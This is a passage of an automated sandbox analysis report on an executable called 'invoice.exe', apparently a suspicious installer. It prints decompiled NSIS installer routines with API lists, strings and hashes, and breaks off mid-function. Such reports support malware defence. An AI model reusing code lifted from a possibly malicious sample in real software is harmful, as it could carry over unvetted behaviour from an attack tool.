                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: Yllerion Setup: Installing
                                            • API String ID: 590372296-2322757991
                                            • Opcode ID: e9cc725ee0651f9e3bb7bb627a473a378111f32a2011408fb0017e783986cbfa
                                            • Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
                                            • Opcode Fuzzy Hash: e9cc725ee0651f9e3bb7bb627a473a378111f32a2011408fb0017e783986cbfa
                                            • Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            [Figure: control-flow graph of function 00402D48; legend: Executed / Not Executed]
                                            C-Code - Quality: 80%
                                            			E00402D48(void* __eflags, signed int _a4) {
                                            				DWORD* _v8;
                                            				DWORD* _v12;
                                            				void* _v16;
                                            				intOrPtr _v20;
                                            				long _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				signed int _v44;
                                            				long _t43;
                                            				signed int _t50;
                                            				void* _t53;
                                            				void* _t57;
                                            				intOrPtr* _t59;
                                            				long _t60;
                                            				signed int _t65;
                                            				signed int _t70;
                                            				signed int _t71;
                                            				signed int _t77;
                                            				intOrPtr _t80;
                                            				long _t82;
                                            				signed int _t85;
                                            				signed int _t87;
                                            				void* _t89;
                                            				signed int _t90;
                                            				signed int _t93;
                                            				void* _t94;
                                            
                                            				_t82 = 0;
                                            				_v12 = 0;
                                            				_v8 = 0;
                                            				_t43 = GetTickCount();
                                            				_t91 = "C:\\Users\\Arthur\\Desktop\\invoice.exe";
                                            				 *0x42f410 = _t43 + 0x3e8;
                                            				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\invoice.exe", 0x400);
                                            				_t89 = E00405AFE(_t91, 0x80000000, 3);
                                            				_v16 = _t89;
                                            				 *0x40a018 = _t89;
                                            				if(_t89 == 0xffffffff) {
                                            					return "Error launching installer";
                                            				}
                                            				_t92 = "C:\\Users\\Arthur\\Desktop";
                                            				E00405F65("C:\\Users\\Arthur\\Desktop", _t91);
                                            				E00405F65(0x437000, E00405944(_t92));
                                            				_t50 = GetFileSize(_t89, 0);
                                            				__eflags = _t50;
                                            				 *0x42142c = _t50;
                                            				_t93 = _t50;
                                            				if(_t50 <= 0) {
                                            					L24:
                                            					E00402CE4("true");
                                            					__eflags =  *0x42f418 - _t82;
                                            					if( *0x42f418 == _t82) {
                                            						goto L29;
                                            					}
                                            					__eflags = _v8 - _t82;
                                            					if(_v8 == _t82) {
                                            						L28:
                                            						_t53 = GlobalAlloc(0x40, _v24); // executed
                                            						_t94 = _t53;
                                            						E004031A9( *0x42f418 + 0x1c);
                                            						_push(_v24);
                                            						_push(_t94);
                                            						_push(_t82);
                                            						_push(0xffffffff); // executed
                                            						_t57 = E00402F81(); // executed
                                            						__eflags = _t57 - _v24;
                                            						if(_t57 == _v24) {
                                            							__eflags = _v44 & 0x00000001;
                                            							 *0x42f414 = _t94;
                                            							 *0x42f41c =  *_t94;
                                            							if((_v44 & 0x00000001) != 0) {
                                            								 *0x42f420 =  *0x42f420 + 1;
                                            								__eflags =  *0x42f420;
                                            							}
                                            							_t40 = _t94 + 0x44; // 0x44
                                            							_t59 = _t40;
                                            							_t85 = 8;
                                            							do {
                                            								_t59 = _t59 - 8;
                                            								 *_t59 =  *_t59 + _t94;
                                            								_t85 = _t85 - 1;
                                            								__eflags = _t85;
                                            							} while (_t85 != 0);
                                            							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
                                            							 *(_t94 + 0x3c) = _t60;
                                            							E00405AB9(0x42f440, _t94 + 4, 0x40);
                                            							__eflags = 0;
                                            							return 0;
                                            						}
                                            						goto L29;
                                            					}
                                            					E004031A9( *0x415420);
                                            					_t65 = E00403193( &_a4, 4);
                                            					__eflags = _t65;
                                            					if(_t65 == 0) {
                                            						goto L29;
                                            					}
                                            					__eflags = _v12 - _a4;
                                            					if(_v12 != _a4) {
                                            						goto L29;
                                            					}
                                            					goto L28;
                                            				} else {
                                            					do {
                                            						_t90 = _t93;
                                            						asm("sbb eax, eax");
                                            						_t70 = ( ~( *0x42f418) & 0x00007e00) + 0x200;
                                            						__eflags = _t93 - _t70;
                                            						if(_t93 >= _t70) {
                                            							_t90 = _t70;
                                            						}
                                            						_t71 = E00403193(0x421430, _t90);
                                            						__eflags = _t71;
                                            						if(_t71 == 0) {
                                            							E00402CE4("true");
                                            							L29:
                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                            						}
                                            						__eflags =  *0x42f418;
                                            						if( *0x42f418 != 0) {
                                            							__eflags = _a4 & 0x00000002;
                                            							if((_a4 & 0x00000002) == 0) {
                                            								E00402CE4(0);
                                            							}
                                            							goto L20;
                                            						}
                                            						E00405AB9( &_v44, 0x421430, 0x1c);
                                            						_t77 = _v44;
                                            						__eflags = _t77 & 0xfffffff0;
                                            						if((_t77 & 0xfffffff0) != 0) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v40 - 0xdeadbeef;
                                            						if(_v40 != 0xdeadbeef) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v28 - 0x74736e49;
                                            						if(_v28 != 0x74736e49) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v32 - 0x74666f73;
                                            						if(_v32 != 0x74666f73) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v36 - 0x6c6c754e;
                                            						if(_v36 != 0x6c6c754e) {
                                            							goto L20;
                                            						}
                                            						_a4 = _a4 | _t77;
                                            						_t87 =  *0x415420; // 0xd02b5
                                            						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
                                            						_t80 = _v20;
                                            						__eflags = _t80 - _t93;
                                            						 *0x42f418 = _t87;
                                            						if(_t80 > _t93) {
                                            							goto L29;
                                            						}
                                            						__eflags = _a4 & 0x00000008;
                                            						if((_a4 & 0x00000008) != 0) {
                                            							L16:
                                            							_v8 = _v8 + 1;
                                            							_t24 = _t80 - 4; // 0x40a194
                                            							_t93 = _t24;
                                            							__eflags = _t90 - _t93;
                                            							if(_t90 > _t93) {
                                            								_t90 = _t93;
                                            							}
                                            							goto L20;
                                            						}
                                            						__eflags = _a4 & 0x00000004;
                                            						if((_a4 & 0x00000004) != 0) {
                                            							break;
                                            						}
                                            						goto L16;
                                            						L20:
                                            						__eflags = _t93 -  *0x42142c; // 0xd24e8
                                            						if(__eflags < 0) {
                                            							_v12 = E004063B4(_v12, 0x421430, _t90);
                                            						}
                                            						 *0x415420 =  *0x415420 + _t90;
                                            						_t93 = _t93 - _t90;
                                            						__eflags = _t93;
                                            					} while (_t93 > 0);
                                            					_t82 = 0;
                                            					__eflags = 0;
                                            					goto L24;
                                            				}
                                            			}
































                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402D59
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\invoice.exe,00000400), ref: 00402D75
                                              • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405B02
                                              • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B24
                                            • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\invoice.exe,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00402DC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\invoice.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\invoice.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$$
                                            • API String ID: 4283519449-1508458362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E0040572D(void* __eflags, signed int _a4, signed int _a8) {
                                            				signed int _v8;
                                            				void* _v12;
                                            				signed int _v16;
                                            				struct _WIN32_FIND_DATAA _v336;
                                            				signed int _t40;
                                            				char* _t53;
                                            				signed int _t55;
                                            				signed int _t58;
                                            				signed int _t64;
                                            				signed int _t66;
                                            				void* _t68;
                                            				signed char _t69;
                                            				CHAR* _t71;
                                            				void* _t72;
                                            				CHAR* _t73;
                                            				char* _t76;
                                            
                                            				_t69 = _a8;
                                            				_t73 = _a4;
                                            				_v8 = _t69 & 0x00000004;
                                            				_t40 = E004059EB(__eflags, _t73);
                                            				_v16 = _t40;
                                            				if((_t69 & 0x00000008) != 0) {
                                            					_t66 = DeleteFileA(_t73); // executed
                                            					asm("sbb eax, eax");
                                            					_t68 =  ~_t66 + 1;
                                            					 *0x42f4a8 =  *0x42f4a8 + _t68;
                                            					return _t68;
                                            				}
                                            				_a4 = _t69;
                                            				_t8 =  &_a4;
                                            				 *_t8 = _a4 & 0x00000001;
                                            				__eflags =  *_t8;
                                            				if( *_t8 == 0) {
                                            					L5:
                                            					E00405F65(0x42b878, _t73);
                                            					__eflags = _a4;
                                            					if(_a4 == 0) {
                                            						E00405944(_t73);
                                            					} else {
                                            						lstrcatA(0x42b878, "\*.*");
                                            					}
                                            					__eflags =  *_t73;
                                            					if( *_t73 != 0) {
                                            						L10:
                                            						lstrcatA(_t73, 0x40a014);
                                            						L11:
                                            						_t71 =  &(_t73[lstrlenA(_t73)]);
                                            						_t40 = FindFirstFileA(0x42b878,  &_v336);
                                            						__eflags = _t40 - 0xffffffff;
                                            						_v12 = _t40;
                                            						if(_t40 == 0xffffffff) {
                                            							L29:
                                            							__eflags = _a4;
                                            							if(_a4 != 0) {
                                            								_t32 = _t71 - 1;
                                            								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                            								__eflags =  *_t32;
                                            							}
                                            							goto L31;
                                            						} else {
                                            							goto L12;
                                            						}
                                            						do {
                                            							L12:
                                            							_t76 =  &(_v336.cFileName);
                                            							_t53 = E00405928( &(_v336.cFileName), 0x3f);
                                            							__eflags =  *_t53;
                                            							if( *_t53 != 0) {
                                            								__eflags = _v336.cAlternateFileName;
                                            								if(_v336.cAlternateFileName != 0) {
                                            									_t76 =  &(_v336.cAlternateFileName);
                                            								}
                                            							}
                                            							__eflags =  *_t76 - 0x2e;
                                            							if( *_t76 != 0x2e) {
                                            								L19:
                                            								E00405F65(_t71, _t76);
                                            								__eflags = _v336.dwFileAttributes & 0x00000010;
                                            								if(__eflags == 0) {
                                            									_t55 = E004056E5(__eflags, _t73, _v8);
                                            									__eflags = _t55;
                                            									if(_t55 != 0) {
                                            										E0040508C(0xfffffff2, _t73);
                                            									} else {
                                            										__eflags = _v8 - _t55;
                                            										if(_v8 == _t55) {
                                            											 *0x42f4a8 =  *0x42f4a8 + 1;
                                            										} else {
                                            											E0040508C(0xfffffff1, _t73);
                                            											E00405D44(_t72, _t73, 0);
                                            										}
                                            									}
                                            								} else {
                                            									__eflags = (_a8 & 0x00000003) - 3;
                                            									if(__eflags == 0) {
                                            										E0040572D(__eflags, _t73, _a8);
                                            									}
                                            								}
                                            								goto L27;
                                            							}
                                            							_t64 =  *((intOrPtr*)(_t76 + 1));
                                            							__eflags = _t64;
                                            							if(_t64 == 0) {
                                            								goto L27;
                                            							}
                                            							__eflags = _t64 - 0x2e;
                                            							if(_t64 != 0x2e) {
                                            								goto L19;
                                            							}
                                            							__eflags =  *((char*)(_t76 + 2));
                                            							if( *((char*)(_t76 + 2)) == 0) {
                                            								goto L27;
                                            							}
                                            							goto L19;
                                            							L27:
                                            							_t58 = FindNextFileA(_v12,  &_v336);
                                            							__eflags = _t58;
                                            						} while (_t58 != 0);
                                            						_t40 = FindClose(_v12);
                                            						goto L29;
                                            					}
                                            					__eflags =  *0x42b878 - 0x5c;
                                            					if( *0x42b878 != 0x5c) {
                                            						goto L11;
                                            					}
                                            					goto L10;
                                            				} else {
                                            					__eflags = _t40;
                                            					if(_t40 == 0) {
                                            						L31:
                                            						__eflags = _a4;
                                            						if(_a4 == 0) {
                                            							L39:
                                            							return _t40;
                                            						}
                                            						__eflags = _v16;
                                            						if(_v16 != 0) {
                                            							_t40 = E00406268(_t73);
                                            							__eflags = _t40;
                                            							if(_t40 == 0) {
                                            								goto L39;
                                            							}
                                            							E004058FD(_t73);
                                            							_t40 = E004056E5(__eflags, _t73, _v8 | 0x00000001);
                                            							__eflags = _t40;
                                            							if(_t40 != 0) {
                                            								return E0040508C(0xffffffe5, _t73);
                                            							}
                                            							__eflags = _v8;
                                            							if(_v8 == 0) {
                                            								goto L33;
                                            							}
                                            							E0040508C(0xfffffff1, _t73);
                                            							return E00405D44(_t72, _t73, 0);
                                            						}
                                            						L33:
                                            						 *0x42f4a8 =  *0x42f4a8 + 1;
                                            						return _t40;
                                            					}
                                            					__eflags = _t69 & 0x00000002;
                                            					if((_t69 & 0x00000002) == 0) {
                                            						goto L31;
                                            					}
                                            					goto L5;
                                            				}
                                            			}




















                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405756
                                            • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040579E
                                            • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057BF
                                            • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C5
                                            • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D6
                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
                                            • FindClose.KERNEL32(00000000), ref: 00405894
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040573A
                                            • \*.*, xrefs: 00405798
                                            • "C:\Users\user\Desktop\invoice.exe", xrefs: 0040572D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\invoice.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-4262360876
                                            • Opcode ID: f7f96faad53d03e1b16e49c91bcd31d62ded0bd436c9b9e205275b97677bab50
                                            • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
                                            • Opcode Fuzzy Hash: f7f96faad53d03e1b16e49c91bcd31d62ded0bd436c9b9e205275b97677bab50
                                            • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E004020CB() {
                                            				signed int _t55;
                                            				void* _t59;
                                            				intOrPtr* _t63;
                                            				intOrPtr _t64;
                                            				intOrPtr* _t65;
                                            				intOrPtr* _t67;
                                            				intOrPtr* _t69;
                                            				intOrPtr* _t71;
                                            				intOrPtr* _t73;
                                            				intOrPtr* _t75;
                                            				intOrPtr* _t78;
                                            				intOrPtr* _t80;
                                            				intOrPtr* _t82;
                                            				intOrPtr* _t84;
                                            				int _t87;
                                            				intOrPtr* _t95;
                                            				signed int _t105;
                                            				signed int _t109;
                                            				void* _t111;
                                            
                                            				 *(_t111 - 0x3c) = E00402AC1(0xfffffff0);
                                            				 *(_t111 - 0xc) = E00402AC1(0xffffffdf);
                                            				 *((intOrPtr*)(_t111 - 0x80)) = E00402AC1(2);
                                            				 *((intOrPtr*)(_t111 - 0x7c)) = E00402AC1(0xffffffcd);
                                            				 *((intOrPtr*)(_t111 - 0x34)) = E00402AC1(0x45);
                                            				_t55 =  *(_t111 - 0x18);
                                            				 *(_t111 - 0x88) = _t55 & 0x00000fff;
                                            				_t105 = _t55 & 0x00008000;
                                            				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                            				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
                                            				if(E0040596A( *(_t111 - 0xc)) == 0) {
                                            					E00402AC1(0x21);
                                            				}
                                            				_t59 = _t111 + 8;
                                            				__imp__CoCreateInstance(0x408514, _t87, "true", 0x408504, _t59); // executed
                                            				if(_t59 < _t87) {
                                            					L15:
                                            					 *((intOrPtr*)(_t111 - 4)) = 1;
                                            					_push(0xfffffff0);
                                            				} else {
                                            					_t63 =  *((intOrPtr*)(_t111 + 8));
                                            					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408524, _t111 - 0x30);
                                            					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                            					if(_t64 >= _t87) {
                                            						_t67 =  *((intOrPtr*)(_t111 + 8));
                                            						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                            						if(_t105 == _t87) {
                                            							_t84 =  *((intOrPtr*)(_t111 + 8));
                                            							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship");
                                            						}
                                            						if(_t109 != _t87) {
                                            							_t82 =  *((intOrPtr*)(_t111 + 8));
                                            							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                            						}
                                            						_t69 =  *((intOrPtr*)(_t111 + 8));
                                            						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
                                            						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
                                            						if( *_t95 != _t87) {
                                            							_t80 =  *((intOrPtr*)(_t111 + 8));
                                            							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
                                            						}
                                            						_t71 =  *((intOrPtr*)(_t111 + 8));
                                            						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
                                            						_t73 =  *((intOrPtr*)(_t111 + 8));
                                            						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
                                            						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                            							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                            							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                            								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                            								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), "true");
                                            							}
                                            						}
                                            						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                            						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                            					}
                                            					_t65 =  *((intOrPtr*)(_t111 + 8));
                                            					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                            					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                            						_push(0xfffffff4);
                                            					} else {
                                            						goto L15;
                                            					}
                                            				}
                                            				E00401423();
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
                                            				return 0;
                                            			}























                                            APIs
                                            • CoCreateInstance.OLE32(00408514,?,?,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                            Strings
                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship, xrefs: 0040218D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship
                                            • API String ID: 123533781-1385751471
                                            • Opcode ID: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                                            • Instruction ID: 70e90dd273e36d6cf470b0c6c9ff695bb876e65ea6d8ae05c01ad1deac9bcbee
                                            • Opcode Fuzzy Hash: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                                            • Instruction Fuzzy Hash: D9512775A00208BFCF10DFE4C988A9DBBB5EF48318F2045AAF915EB2D1DA799941CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00406268(CHAR* _a4) {
                                            				void* _t2;
                                            
                                            				_t2 = FindFirstFileA(_a4, 0x42c0c0); // executed
                                            				if(_t2 == 0xffffffff) {
                                            					return 0;
                                            				}
                                            				FindClose(_t2);
                                            				return 0x42c0c0;
                                            			}





                                            APIs
                                            • FindFirstFileA.KERNELBASE(76793410,0042C0C0,0042BC78,00405A2E,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\), ref: 00406273
                                            • FindClose.KERNEL32(00000000), ref: 0040627F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                            • Instruction ID: e0279db6a2f9a876ecb4b02bc738002a428a13ad585e0dc9357aaf1afb57e826
                                            • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                            • Instruction Fuzzy Hash: 9DD012365060209FC25027786D0C85B7A589F053317118B7FF8AAF21E0C7348CA386DC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            (Graph rendering not preserved. Legend: Executed / Not Executed.)
                                            C-Code - Quality: 84%
                                            			E00403B52(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                            				struct HWND__* _v32;
                                            				void* _v84;
                                            				void* _v88;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t35;
                                            				signed int _t37;
                                            				signed int _t39;
                                            				struct HWND__* _t49;
                                            				signed int _t68;
                                            				struct HWND__* _t74;
                                            				signed int _t87;
                                            				struct HWND__* _t92;
                                            				signed int _t100;
                                            				int _t104;
                                            				signed int _t116;
                                            				signed int _t117;
                                            				int _t118;
                                            				signed int _t123;
                                            				struct HWND__* _t126;
                                            				struct HWND__* _t127;
                                            				int _t128;
                                            				long _t131;
                                            				int _t133;
                                            				int _t134;
                                            				void* _t135;
                                            				void* _t143;
                                            
                                            				_t116 = _a8;
                                            				if(_t116 == 0x110 || _t116 == 0x408) {
                                            					_t35 = _a12;
                                            					_t126 = _a4;
                                            					__eflags = _t116 - 0x110;
                                            					 *0x42a858 = _t35;
                                            					if(_t116 == 0x110) {
                                            						 *0x42f408 = _t126;
                                            						 *0x42a86c = GetDlgItem(_t126, "true");
                                            						_t92 = GetDlgItem(_t126, 2);
                                            						_push(0xffffffff);
                                            						_push(0x1c);
                                            						 *0x429838 = _t92;
                                            						E00404026(_t126);
                                            						SetClassLongA(_t126, 0xfffffff2,  *0x42ebe8);
                                            						 *0x42ebcc = E0040140B(4);
                                            						_t35 = 1;
                                            						__eflags = 1;
                                            						 *0x42a858 = 1;
                                            					}
                                            					_t123 =  *0x40a1dc; // 0x0
                                            					_t134 = 0;
                                            					_t131 = (_t123 << 6) +  *0x42f440;
                                            					__eflags = _t123;
                                            					if(_t123 < 0) {
                                            						L34:
                                            						E00404072(0x40b);
                                            						while(1) {
                                            							_t37 =  *0x42a858;
                                            							 *0x40a1dc =  *0x40a1dc + _t37;
                                            							_t131 = _t131 + (_t37 << 6);
                                            							_t39 =  *0x40a1dc; // 0x0
                                            							__eflags = _t39 -  *0x42f444;
                                            							if(_t39 ==  *0x42f444) {
                                            								E0040140B("true");
                                            							}
                                            							__eflags =  *0x42ebcc - _t134; // 0x0
                                            							if(__eflags != 0) {
                                            								break;
                                            							}
                                            							__eflags =  *0x40a1dc -  *0x42f444; // 0x0
                                            							if(__eflags >= 0) {
                                            								break;
                                            							}
                                            							_t117 =  *(_t131 + 0x14);
                                            							E00405F87(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                            							_push( *((intOrPtr*)(_t131 + 0x20)));
                                            							_push(0xfffffc19);
                                            							E00404026(_t126);
                                            							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                            							_push(0xfffffc1b);
                                            							E00404026(_t126);
                                            							_push( *((intOrPtr*)(_t131 + 0x28)));
                                            							_push(0xfffffc1a);
                                            							E00404026(_t126);
                                            							_t49 = GetDlgItem(_t126, 3);
                                            							__eflags =  *0x42f4ac - _t134;
                                            							_v32 = _t49;
                                            							if( *0x42f4ac != _t134) {
                                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                            								__eflags = _t117;
                                            							}
